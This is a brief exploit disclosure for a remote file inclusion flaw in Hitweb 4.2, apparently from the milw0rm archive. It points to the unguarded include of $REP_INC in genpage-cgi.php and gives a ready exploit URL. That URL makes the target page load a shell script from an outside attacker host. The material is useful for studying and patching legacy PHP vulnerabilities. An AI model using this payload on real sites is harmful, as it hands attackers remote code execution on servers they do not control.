Hitweb 4.2 Remote Include File

CreW: ToxiC

Bug Found By Drago84

Sorce Code:
http://freshmeat.net/redir/hitweb/15633/url_tgz/hitweb-4.2_php.tgz

Problem is:
include "$REP_INC/lib_database.php";

Page:
genpage-cgi.php

Path:
Declare $REP_INC

Expl:
http://www.site.com/dir_hitweb/genpage-cgi.php?REP_INC=http://www.evalsite.com/shell.php?

Greatz:Str0ke

# milw0rm.com [2006-08-08]